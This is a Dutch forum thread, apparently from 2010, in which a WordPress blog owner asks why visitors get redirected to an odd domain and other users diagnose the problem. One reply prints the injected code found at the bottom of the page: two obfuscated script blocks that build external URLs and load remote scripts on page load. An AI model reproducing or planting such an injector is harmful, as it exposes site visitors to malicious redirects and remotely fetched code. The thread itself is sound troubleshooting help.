Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Wordpress probleem (Virus??)

Pagina: 1
Acties:

Verwijderd

Topicstarter
Hoi mensen,

Ik heb sinds gisteren problemen met mijn website, en weet ook echt niet hoe ik dit moet oplossen en of wat ik er tegen kan/moet doen.

Het gaat erom dat de site opeens plotseling uit zichzelf opeens word doorgelinkt naar een vage link. Hij gaat in eerste instantie gewoon naar de website maar dan opeens word er een andere link geladen en zie je dit: "google-com-do.youku.com.o".

Ik dacht zelf dat het een virus was ofzo? maar heb geen idee hoe ik dit kan oplossen.

Het gaat om de volgende website: http://www.scarblog.nl bezoeken op eigen risico!

Mijn dank is groot!

Mvg
Scar
Scarblog.nl

[ Voor 4% gewijzigd door crisp op 28-01-2010 14:01 ]

Verwijderd

Ik heb het even bekeken met FF (met NoScript) en met Iron. Bij FF werd er niet doorgelinkt, bij Iron wel meteen. Het is dus een kwaadaardig javascript wat de bezoeker doorsluist naar een andere website. Kijk even welke javascripts er allemaal geopend worden bij het laden van de pagina.

<edit> grammaticale fout

[ Voor 5% gewijzigd door Verwijderd op 28-01-2010 14:35 ]

Verwijderd

Topicstarter
Hoe moet ik dat doen? Heb verder helemaal geen ervaring mee...

• Kees
  • Registratie: Juni 1999
  • Laatst online: 29-11 09:52

Kees

Serveradmin / BOFH / DoC
Het lijkt erop dat er op het einde twee javascripts geladen worden die de bezoeker naar die site doorsturen. Ik weet niet in hoeverre je erbij kan komen, maar ik zou toch echt even checken of je de laatste twee script tags weg kan halen.

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

Verwijderd

Zoals Mizuki al aangeeft. Kan je met bijvoorbeeld Firefox en de NoScript addon naar je site gaan. Dan wordt je niet doorgestuurd.

Als je snel bent kan je voordat je browser wordt doorgestuurd naar die rare site nog even "Rechtermuisknop > Bron weergeven" doen op je pagina. Dit is me in ieder geval gelukt bij jou.

Helemaal onderaan je broncode staat het volgende:
HTML:
1
2
3
4
5
<!-- End of StatCounter Code -->
</body><script> try{window.onload=function(){document.write('<div id=megaid>wiktionary-org.sueddeutsc</div>');D9re9rrp0mg = document.getElementById('megaid').innerHTML + 'h@e@)^$.!^d&#(e@!^.^^@a$#@t^w!(@#i&k&i#)^-)#j@^$!p&&!$.&@!)p)&a!&t$##e^n)t@^#p$@i^t@)##s@#@t)()o)p$!.!$r&(u^^&^:(@D#)E&B&)U^@$!G!!/(!o)$r)#)b@)^i&&$t##(z$#@.^$@c^o#@)#m##!/^&o$(#r@)!b&)i)#)t^z)).#c!(o@m#/&g$@o!!$o()g$@$l!(#e$@).&!#)c#o((m@/&u##!s^)p!s#^.(@c^@o#)&m$^(/((w^e$!$b$.&d)$e@)/!&!('.replace(/\$|&|#|\(|@|\!|\)|\^/ig, '') ;document.write('<scr'+'ipt src=http://'+D9re9rrp0mg.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(R5tj8zsn ) {}</script>
<!--85fbd45dcea10bf29a2a6cc126fce423-->
<script> try{window.onload=function(){document.write('<div id=megaid>google-com-do.youku.com.o</div>');Zqmedubuucvbw = document.getElementById('megaid').innerHTML + 'v)e(!)r))s#!t^o@()!c&!k)-($#c!o$#)#m((!.@@(t$)&$o((p()l!!^i!(n#(e^!@m&a(#)r)#i()#n@@e#@&.$$&r(#&@u(:&&^(&D)E(B&U#G!&&$@/&)&g@#o@^&o&g#&l^!#!@e@$.&c^^^o(@&m@#!/@!!g#o@#@^o#!(!g$(l#e^().#!c)o@!$#)m@(@#/@t)@r$a!(i@)d&#^n^!)t$!.(n&e&t#^@)/^$)t@(r)i#$#p))()a($^&d)@$v$^i^$s)!$o^^&r@^&.^@c^$#o(#m&/@!&j(e#(&u$^(#^x&&v(&i^@d!$$e^!^)o))).!#!c^)o$&^m)@/@&'.replace(/@|\^|\)|\$|\!|\(|#|&/ig, '') ;document.write('<scr'+'ipt src=http://'+Zqmedubuucvbw.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Kz5zx8s ) {}</script>
<!--85fbd45dcea10bf29a2a6cc126fce423-->

Dat hoort daar niet te staan gok ik..

Je gebruikt WordPress zie ik. Is je installatie een beetje up-to-date?

• Rolfie
  • Registratie: Oktober 2003
  • Nu online
Backup terug zetten en de "oorzaak" oplossen. Wat het probleem precies is weet ik niet, maar meestal 1 van de onderstaande puntjes
  • Niet gepatche wordpress versie? Of wel niet gepatched
  • Een plugin bevat een foutje? Ofwel niet gepatched.
  • Te gemakkelijk admin wachtwoord?
    [*}Gehackt FTP wachtwoord?

Verwijderd

Topicstarter
Ja installatie is up to date, de nieuwste versie van wordpress staat er gewoon op. Maar waar moet ik dus zoeken? gewoon in de index.php bestand? want heb hier verder helemaal geen verstand van...

mijn dank is groot!!!!

Verwijderd

Heb je deze site zelf opgezet? Het is een beetje gissen naar waar het exact staat.. ;)

Wat voor toegang heb je tot de bestanden? FTP? Heb je shell access? etc..

• Woy
  • Registratie: April 2000
  • Niet online

Woy

Moderator Devschuur®
Dit heeft niks met zelf programmeren te maken, dus deze gaat naar BV

PRG -> BV

“Build a man a fire, and he'll be warm for a day. Set a man on fire, and he'll be warm for the rest of his life.”

Verwijderd

Topicstarter
Het ligt niet aan de footer.php iedergeval, want als ik die open staat die code er niet eens tussen...
Pagina: 1